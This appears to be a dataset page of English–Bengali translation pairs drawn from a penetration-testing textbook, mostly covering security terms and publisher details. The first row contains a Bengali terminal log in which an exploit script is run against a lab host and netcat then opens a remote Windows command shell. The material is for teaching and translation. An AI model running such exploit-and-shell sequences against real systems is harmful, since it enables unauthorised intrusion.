4444-এ খুলবে, যেমন তালিকা 19-7-এ দেখানো হয়েছে। root@kali:~# ./exploitdbexploit.pl 192.168.20.10 69 ++ দূষিত প্যাকেট তৈরি করা হচ্ছে ..... ++ এক্সপ্লয়েট প্যাকেট পাঠানো হয়েছে ... ++ সম্পন্ন। ++ ভিকটিমের মেশিনে 4444-এ টেলনেট করুন .... root@kali:~# nc 192.168.20.10 4444 মাইক্রোসফ্ট উইন্ডোজ এক্সপি [সংস্করণ 5.1.2600] (C) কপিরাইট 1985-2001 মাইক্রোসফ্ট কর্পোরেশন C:\WINDOWS\system32> তালিকা 19-7: পোর্টেড এক্সপ্লয়েট চালানো মেটাসপ্লয়েট মডিউল লেখা এই বইটিতে আমরা তথ্য সংগ্রহ, শোষণ, পোস্ট শোষণ ইত্যাদির জন্য অনেক মেটাসপ্লয়েট মডিউল ব্যবহার করেছি। নতুন দুর্বলতা আবিষ্কার হওয়ার সাথে সাথে, মেটাসপ্লয়েট মডিউলগুলি এই সমস্যাগুলির জন্য লেখা হয়, প্রায়শই আপনার মতো নিরাপত্তা সম্প্রদায়ের সদস্যদের দ্বারা। এছাড়াও, গবেষকদের দ্বারা নতুন পোস্ট-শোষণ বা তথ্য-সংগ্রহ কৌশলগুলি প্রয়োগ করার সাথে সাথে, সেগুলি প্রায়শই মেটাসপ্লয়েট মডিউলগুলিতে স্থানান্তরিত হয়। এই বিভাগে, আমরা আমাদের নিজস্ব মেটাসপ্লয়েট এক্সপ্লয়েট মডিউল লেখার মূল বিষয়গুলি দেখব।
|
bn
|
technical
|
complex
|
Hashes storage.
|
হ্যাশ সংরক্ষণাগার।
|
bn
|
technical
|
simple
|
Local privilege escalation.
|
স্থানীয় সুযোগ বৃদ্ধি।
|
bn
|
technical
|
moderate
|
Nessus detection of vulnerabilities.
|
দুর্বলতা সনাক্তকরণের জন্য নেসাস ব্যবহার।
|
bn
|
technical
|
moderate
|
Setup to behave as member of Windows domain.
|
উইন্ডোজ ডোমেনের সদস্য হিসাবে কাজ করার জন্য সেটআপ করুন।
|
bn
|
technical
|
moderate
|
The book was printed and bound by Sheridan Books, Inc. in Chelsea, Michigan.
|
বইটি মিশিগানের চেলসিতে অবস্থিত শেরिडান বুকস, ইনকর্পোরেটেড দ্বারা মুদ্রিত ও বাঁধাই করা হয়েছে।
|
bn
|
general
|
moderate
|
The paper is 60# Finch Offset, which is certified by the Forest Stewardship Council (FSC).
|
কাগজটি হলো ৬০# ফিঞ্চ অফসেট, যা ফরেস্ট স্টুয়ার্ডশিপ কাউন্সিল (FSC) দ্বারা প্রত্যয়িত।
|
bn
|
technical
|
moderate
|
Visit http://nostarch.com/pentesting/ for updates, errata, and other information.
|
আপডেট, ভুল সংশোধন এবং অন্যান্য তথ্যের জন্য http://nostarch.com/pentesting/ দেখুন।
|
bn
|
technical
|
simple
|
phone: 800.420.7240 or 415.863.9900
|
ফোন: 800.420.7240 অথবা 415.863.9900
|
bn
|
general
|
simple
|
email: sales@nostarch.com
|
ইমেইল: sales@nostarch.com
|
bn
|
general
|
simple
|
web : w w w.nostarch.com
|
ওয়েবসাইট: w w w.nostarch.com
|
bn
|
general
|
simple
|
Downloading the Software to Build Your Virtual Lab
|
আপনার ভার্চুয়াল ল্যাব তৈরি করতে সফ্টওয়্যার ডাউনলোড করা হচ্ছে
|
bn
|
technical
|
moderate
|
You’ll find links for the resources used in this book at http://www.nostarch.com/ pentesting/
|
আপনি এই বইটিতে ব্যবহৃত সংস্থানগুলির লিঙ্কগুলি http://www.nostarch.com/ pentesting/ এ খুঁজে পাবেন।
|
bn
|
technical
|
moderate
|
Use the password 1stPentestBook?! to open the 7-Zip archive containing the book’s resources.
|
বইটির সম্পদ ধারণকারী ৭-জিপ আর্কাইভ খুলতে 1stPentestBook?! পাসওয়ার্ডটি ব্যবহার করুন।
|
bn
|
technical
|
moderate
|
You can find 7-Zip programs for Windows and Linux platforms at http :// www.7-zip.org/download.html.
|
আপনি উইন্ডোজ এবং লিনাক্স প্ল্যাটফর্মের জন্য ৭-জিপ প্রোগ্রামগুলি http :// www.7-zip.org/download.html-এ খুঁজে পেতে পারেন।
|
bn
|
technical
|
moderate
|
Mac users can use Ez7z from http://ez7z .en.softonic .com/mac/.
|
ম্যাক ব্যবহারকারীরা http://ez7z .en.softonic .com/mac/ থেকে Ez7z ব্যবহার করতে পারেন।
|
bn
|
technical
|
moderate
|
If you’re unable to download the files or you’d just like them delivered to your doorstep, we’ll send you a DVD containing the files for US $10.
|
যদি আপনি ফাইলগুলি ডাউনলোড করতে অক্ষম হন বা সেগুলি আপনার দোরগোড়ায় পেতে চান, তবে আমরা আপনাকে US $10 মূল্যে ফাইলগুলি সহ একটি ডিভিডি পাঠাব।
|
bn
|
general
|
complex
|
You’ll find additional resources at Georgia Weidman’s website: http :// bulbsecurity.com/.
|
আপনি জর্জিয়া ওয়েইডম্যানের ওয়েবসাইটে অতিরিক্ত সংস্থানগুলি খুঁজে পাবেন: http :// bulbsecurity.com/।
|
bn
|
technical
|
moderate
|
Wireless attacks.
|
ওয়্যারলেস আক্রমণ।
|
bn
|
technical
|
simple
|
Capturing packets.
|
প্যাকেট ধরা।
|
bn
|
technical
|
simple
|
Scanning for access points.
|
অ্যাক্সেস পয়েন্টগুলির জন্য স্ক্যান করা।
|
bn
|
technical
|
simple
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.